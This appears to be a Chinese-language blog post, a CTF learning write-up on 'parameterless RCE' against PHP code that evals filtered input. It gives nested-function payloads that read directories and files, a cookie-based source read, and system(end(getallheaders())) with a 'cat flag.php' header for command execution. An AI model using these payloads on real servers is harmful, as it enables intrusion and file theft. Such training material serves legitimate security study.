<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="无参数rec学习"><meta name="keywords" content=""><meta name="author" content="Y."><meta name="copyright" content="Y."><title>无参数rec学习 | Y. blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Y. blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%97%A0%E5%8F%82%E6%95%B0rec"><span class="toc-number">1.</span> <span class="toc-text">无参数rec</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%97%A0%E5%8F%82%E6%95%B0rec%E7%9B%B8%E5%85%B3%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-number">2.</span> <span class="toc-text">无参数rec相关常用函数</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E7%BB%83%E4%B9%A0"><span class="toc-number">3.</span> <span class="toc-text">题目练习</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-number">3.1.</span> <span class="toc-text">方法一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-number">3.2.</span> <span class="toc-text">方法二</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%89"><span class="toc-number">3.3.</span> <span class="toc-text">方法三</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E5%9B%9B"><span class="toc-number">3.4.</span> <span class="toc-text">方法四</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%B7%B3%E8%BD%AC%E7%9B%AE%E5%BD%95"><span class="toc-number">4.</span> <span class="toc-text">跳转目录</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://note.youdao.com/yws/api/personal/file/WEB4d4bfca5baf6c87d4aa15350aa33e8a7?method=download&amp;shareKey=fec53138a84367efadb03ddfa08bcb24"></div><div class="author-info__name text-center">Y.</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">8</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Y. blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right"></span></div><div id="post-info"><div id="post-title">无参数rec学习</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-11-14</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="无参数rec"><a href="#无参数rec" class="headerlink" title="无参数rec"></a>无参数rec</h1><p>无参数rec，即在不使用参数的条件下，仅使用函数进行REC，简单点来说就是用函数无限套娃，而函数产生的信息就是我们要的参数。<br>一般题目中有这段代码基本就是无参数rec的题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if(&#39;;&#39; &#x3D;&#x3D;&#x3D; preg_replace(&#39;&#x2F;[^\W]+\((?R)?\)&#x2F;&#39;, &#39;&#39;, $_GET[&#39;code&#39;])) &#123;    </span><br><span class="line">    eval($_GET[&#39;code&#39;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="无参数rec相关常用函数"><a href="#无参数rec相关常用函数" class="headerlink" title="无参数rec相关常用函数"></a>无参数rec相关常用函数</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">getchwd() 函数返回当前工作目录。</span><br><span class="line">array_reverse() 以相反的元素顺序返回数组</span><br><span class="line">scandir() 函数返回指定目录中的文件和目录的数组。</span><br><span class="line">dirname() 函数返回路径中的目录部分。</span><br><span class="line">chdir()   函数改变当前的目录。</span><br><span class="line">localeconv() 返回当地金融信息，其中包含了点</span><br><span class="line">readfile()   输出一个文件</span><br><span class="line">chr(pos(localtime())) 利用当前秒数构造点    </span><br><span class="line">current()    返回数组中的当前单元, 默认取第一个值</span><br><span class="line">pos()      current() 的别名</span><br><span class="line">next()     函数将内部指针指向数组中的下一个元素，并输出。</span><br><span class="line">end()      将内部指针指向数组中的最后一个元素，并输出。</span><br><span class="line">array_rand()   函数返回数组中的随机键名，或者如果您规定函数返回不只一个键名，则返回包含随机 键名的数组。 </span><br><span class="line">array_flip()   函数用于反转&#x2F;交换数组中所有的键名以及它们关联的键值。</span><br><span class="line">chr()  函数从指定的 ASCII 值返回字符。</span><br><span class="line">hex2bin()  转换十六进制字符串为二进制字符串</span><br><span class="line">getenv()   获取一个环境变量的值(在7.1之后可以不给予参数)</span><br><span class="line">show_source() 高亮读取文件</span><br><span class="line">highlight_file() 高亮读取文件</span><br></pre></td></tr></table></figure>

<h1 id="题目练习"><a href="#题目练习" class="headerlink" title="题目练习"></a>题目练习</h1><blockquote>
<p>靶机地址：<a target="_blank" rel="noopener" href="http://47.98.234.232:28026/">http://47.98.234.232:28026</a></p>
</blockquote>
<ul>
<li><p>首先先看一下题目源码,可以确定是无参数rec的题<br><img src="https://note.youdao.com/yws/api/personal/file/WEB190740577631b4552b688aafc6134207?method=download&shareKey=43f2dd47cdcef0763175d59cfaa32d12"></p>
</li>
<li><p>看一下这个正则匹配，这样就被匹配到了<br><img src="https://note.youdao.com/yws/api/personal/file/WEB7366994734dcefc5f95d341e8899a808?method=download&shareKey=0092142c205158ebed6a554affdc33ff"></p>
</li>
<li><p>那试一下在里面输入参数呢？这样就没被正则匹配到<br><img src="https://note.youdao.com/yws/api/personal/file/WEB1207e6faa2112776e8509fa940fa70bf?method=download&shareKey=cf9257729dc728e41ad7c2b409070ca4"></p>
</li>
<li><p>那在里面嵌套函数呢？这样就能被匹配，说明只能用函数嵌套来解决这道题<br><img src="https://note.youdao.com/yws/api/personal/file/WEBd8deeaa962e792a3f7a74cdd0a8bc8b4?method=download&shareKey=c73fd1f015face5103b1b4de802300e9"></p>
</li>
<li><p>那接下来就想办法用函数嵌套来获取flag<br>要获取flag就得先看目录，上面说到scandir()这个函数可以看目录，我们试一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php var_dump(scandir(&#39;.&#39;)); ?&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBe42689c9641963351c7d8ad5350f367b?method=download&shareKey=55b0a89990693627e995107871350373"></p>
</li>
</ul>
<p>但这个函数有个问题，就是需要带个参数(‘.’),而通过上面知道不能出现这种参数，那接下来的问题就是怎么用函数构造点</p>
<h2 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h2><p>上面说到localeconv()这个函数包含了点，那用这个函数试一下。</p>
<ul>
<li><p>而点是这个函数的第一个元素，那么用current()、pos()都可以，这里用pos()试试,构造出点<br><img src="https://note.youdao.com/yws/api/personal/file/WEB2cc45007ee08d02df65a4f3cb03de3a9?method=download&shareKey=e5898ef841f2f9adf2b7400e1108ff24"></p>
</li>
<li><p>那把这几个函数嵌套试一下,成功读取目录<br><img src="https://note.youdao.com/yws/api/personal/file/WEB80a97b87588c18492cceedfd5293464a?method=download&shareKey=740e24a284c6589bfa8aaced1a1e869b"></p>
</li>
<li><p>传参进去，发现flag，而且是在最后<br><img src="https://note.youdao.com/yws/api/personal/file/WEBe54d30a1f12b509ec4ca385c916f0fb0?method=download&shareKey=aa9b0e6eba0468582c544b169b04c254"></p>
</li>
<li><p>用end()就可以读取最后一个<br><img src="https://note.youdao.com/yws/api/personal/file/WEB3dca95f74e5682095fefe33060589ff0?method=download&shareKey=3df69be5baba4045f0850404b2cfb32b"></p>
</li>
<li><p>再用readfile()查看文件，拿到flag<br><img src="https://note.youdao.com/yws/api/personal/file/WEB405d647ad8258fa2552ebcddc76fbf39?method=download&shareKey=b74f1362b65419a3036941777de6ed28"></p>
</li>
</ul>
<h2 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h2><p>除了上面这种方法构造点，还有另一种方法也可以构造点</p>
<ul>
<li>利用当前秒数构造点 ，利用localtime()中返回的秒数来构造点,在第46秒就是点<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">var_dump(chr(pos(localtime())));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBca3f892ce0292356dc59480c0dfe56b5?method=download&shareKey=0d335cb3a16be4bf83e5c9941eb2cb1e"></p>
<ul>
<li>跟方法一一样查看文件得到flag<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var_dump(readfile(end(scandir(chr(pos(localtime()))))));</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBe0d9f729ddd6ba740eb2f21d19cb3b08?method=download&shareKey=73c83ca7782216956016acb6cba5884b"></p>
<p><strong>两个构造点法都能拿到flag,但相对来说第一种方便一点，第二种需要等46秒才能得到点，比较麻烦</strong></p>
<h2 id="方法三"><a href="#方法三" class="headerlink" title="方法三"></a>方法三</h2><p>也可以不用构造点来解决，可以利用SESSIONID来传参</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show_source(session_id(session_start()));</span><br></pre></td></tr></table></figure>

<ul>
<li>如图用bp抓包，在cookie那里改成PHPSESSID=flag.php，同样拿到flag<br><img src="https://note.youdao.com/yws/api/personal/file/WEB6a64f65d703aa7b62820c44144cba79c?method=download&shareKey=4c10b3394d772a9eb89bfcedfc2848b3"></li>
</ul>
<h2 id="方法四"><a href="#方法四" class="headerlink" title="方法四"></a>方法四</h2><p>同样也可以利用getallheaders()来获取参数RCE</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(system(end(getallheaders())));</span><br></pre></td></tr></table></figure>
<ul>
<li>用bp抓包在最后请求头添加cat flag.php,读取flag<br><img src="https://note.youdao.com/yws/api/personal/file/WEBf5605ca479e6614f8950fbac4d4e044f?method=download&shareKey=5245c619863bb8692c810516593d4653"></li>
</ul>
<h1 id="跳转目录"><a href="#跳转目录" class="headerlink" title="跳转目录"></a>跳转目录</h1><ul>
<li>当flag在上层目录时，需要跳转<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(implode(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv())))))))))));</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p><strong>总的来说这类题就是用函数套娃来解决，但值得注意的是构造payload时括号不能少了！</strong></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Y.</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2020/11/14/无参数rec学习/">http://example.com/2020/11/14/无参数rec学习/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com">Y. blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/11/20/%E6%B5%B7%E5%95%B8%E6%9D%AFwriteup/"><i class="fa fa-chevron-left">  </i><span>海啸杯writeup</span></a></div><div class="next-post pull-right"><a href="/2020/11/04/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0%E5%8F%8A%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0/"><span>反序列化学习及靶机练习</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2020 By Y.</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>